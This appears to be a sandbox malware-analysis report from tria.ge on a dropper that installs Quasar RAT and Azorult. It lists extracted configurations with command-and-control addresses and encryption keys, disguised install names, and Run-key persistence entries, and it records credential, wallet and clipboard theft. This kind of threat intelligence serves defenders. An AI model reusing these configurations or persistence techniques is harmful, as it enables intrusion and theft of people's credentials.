Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
3241127-xqs...ed.zip
windows10-2004-x64
10241127-xqs...rs.zip
windows10-2004-x64
14363463463...63.zip
windows10-2004-x64
14363463463...63.exe
windows10-2004-x64
10New Text D...se.zip
windows10-2004-x64
1New Text D...od.exe
windows10-2004-x64
10New Text D...od.exe
windows10-2004-x64
10Resubmissions
31/12/2024, 21:35
241231-1fmqnszqft 1031/12/2024, 21:27
241231-1axzfssnek 1016/12/2024, 05:27
241216-f5kx6awmh1 1014/12/2024, 20:23
241214-y6jqlasrhy 1014/12/2024, 20:22
241214-y51bysvmbk 1014/12/2024, 20:13
241214-yzc98svkfr 1014/12/2024, 13:14
241214-qgw1masrcy 1014/12/2024, 13:12
241214-qfk7qsvlaq 312/12/2024, 18:19
241212-wymq6ssnat 10Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12/12/2024, 18:16
Static task
static1
Behavioral task
behavioral1
Sample
241127-xqsswsslej_pw_infected.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
241127-xqsswsslej_pw_infected/Downloaders.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
4363463463464363463463463.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
New Text Document mod.exse.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
New Text Document mod.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
New Text Document mod.exe
Resource
win10v2004-20241007-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
quasar
1.4.0.0
Office
82.117.243.110:5173
yfsS9ida0wX8mgpdJC
-
encryption_key
KDNBgA8jiBeGX1rj1dDt
-
install_name
csrss.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
NET framework
-
subdirectory
SubDir
Extracted
quasar
1.4.1
Aquarius
192.168.8.103:4782
192.168.8.105:4782
192.168.8.114:4782
a198a147-9efc-419d-9539-bac2108dc109
-
encryption_key
4CF458F992C472DE78F317085B34A8A1747FC32D
-
install_name
WindowsDataUpdater.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
WindowsDataUpdater
-
subdirectory
WinBioData
Extracted
quasar
1.4.1
su-pc
192.168.100.2:4444
47a88def-94f4-406d-86f5-8b0b767128df
-
encryption_key
6B74F0C858B7E90573D4E97997F2A082B9781250
-
install_name
x.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
x
-
subdirectory
SubDir
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Quasar family
-
Quasar payload 6 IoCs
resource yara_rule behavioral4/files/0x000a000000023b66-29.dat family_quasar behavioral4/memory/4736-37-0x0000000000450000-0x000000000049E000-memory.dmp family_quasar behavioral4/files/0x000a000000023b71-67.dat family_quasar behavioral4/files/0x000a000000023b6c-77.dat family_quasar behavioral4/memory/2888-90-0x0000000000970000-0x0000000000C94000-memory.dmp family_quasar behavioral4/memory/4388-159-0x0000000000310000-0x0000000000634000-memory.dmp family_quasar -
pid Process 3328 powershell.exe 1100 powershell.exe 4288 powershell.exe 6052 powershell.exe 2336 powershell.exe 3720 Process not Found 4808 Process not Found 2436 powershell.exe 228 powershell.exe 5200 powershell.exe 6060 powershell.exe 5896 powershell.exe 5972 powershell.exe 4872 powershell.exe 5272 powershell.exe 5968 Process not Found 456 Process not Found 2684 powershell.exe 4512 powershell.exe 3536 powershell.exe 2492 powershell.exe 1736 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 12 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts WindowsDefenderUpdater.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts WindowsDefenderUpdater.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts WindowsDefenderUpdater.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts WindowsDefenderUpdater.exe -
Checks computer location settings 2 TTPs 63 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation jtkhikadjthsad.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation Aquarius.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation java.exe -
Clipboard Data 1 TTPs 10 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 5692 Process not Found 3704 cmd.exe 2480 powershell.exe 5804 powershell.exe 5008 cmd.exe 1312 Process not Found 1964 cmd.exe 2248 powershell.exe 5080 cmd.exe 2300 powershell.exe -
Executes dropped EXE 64 IoCs
pid Process 1468 lummnew.exe 4420 build9.exe 4736 jerniuiopu.exe 4516 Aquarius.exe 2888 x.exe 3164 WindowsDefenderUpdater.exe 4388 WindowsDataUpdater.exe 3108 WindowsDefenderUpdater.exe 3460 java.exe 4200 WindowsDefenderUpdater.exe 1740 WindowsDataUpdater.exe 4540 java.exe 3744 WindowsDefenderUpdater.exe 820 WindowsDefenderUpdater.exe 2992 WindowsDataUpdater.exe 1532 java.exe 5292 WindowsDefenderUpdater.exe 5424 WindowsDefenderUpdater.exe 5432 WindowsDataUpdater.exe 2648 java.exe 5680 WindowsDefenderUpdater.exe 5212 WindowsDefenderUpdater.exe 5260 java.exe 4176 WindowsDataUpdater.exe 3356 WindowsDefenderUpdater.exe 820 WindowsDefenderUpdater.exe 5824 WindowsDataUpdater.exe 5672 java.exe 3212 WindowsDefenderUpdater.exe 2468 rar.exe 3248 WindowsDefenderUpdater.exe 3400 WindowsDataUpdater.exe 4200 java.exe 4788 WindowsDefenderUpdater.exe 5064 WindowsDefenderUpdater.exe 1368 java.exe 4948 WindowsDataUpdater.exe 5532 WindowsDefenderUpdater.exe 3752 WindowsDefenderUpdater.exe 5148 WindowsDataUpdater.exe 1120 java.exe 2252 WindowsDefenderUpdater.exe 2528 WindowsDefenderUpdater.exe 5660 WindowsDataUpdater.exe 5184 java.exe 1824 WindowsDefenderUpdater.exe 1640 WindowsDefenderUpdater.exe 5480 WindowsDataUpdater.exe 5484 java.exe 5216 WindowsDefenderUpdater.exe 5284 WindowsDefenderUpdater.exe 5596 WindowsDataUpdater.exe 2788 java.exe 4624 WindowsDefenderUpdater.exe 5704 WindowsDefenderUpdater.exe 5688 WindowsDataUpdater.exe 5600 java.exe 5660 WindowsDefenderUpdater.exe 5204 WindowsDefenderUpdater.exe 2128 WindowsDataUpdater.exe 5276 java.exe 5860 WindowsDefenderUpdater.exe 3752 rar.exe 5972 WindowsDefenderUpdater.exe -
Loads dropped DLL 64 IoCs
pid Process 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3108 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 3744 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5292 WindowsDefenderUpdater.exe 5680 WindowsDefenderUpdater.exe 5680 WindowsDefenderUpdater.exe 5680 WindowsDefenderUpdater.exe 5680 WindowsDefenderUpdater.exe 5680 WindowsDefenderUpdater.exe 5680 WindowsDefenderUpdater.exe 5680 WindowsDefenderUpdater.exe 5680 WindowsDefenderUpdater.exe 5680 WindowsDefenderUpdater.exe 5680 WindowsDefenderUpdater.exe 5680 WindowsDefenderUpdater.exe 5680 WindowsDefenderUpdater.exe 5680 WindowsDefenderUpdater.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = 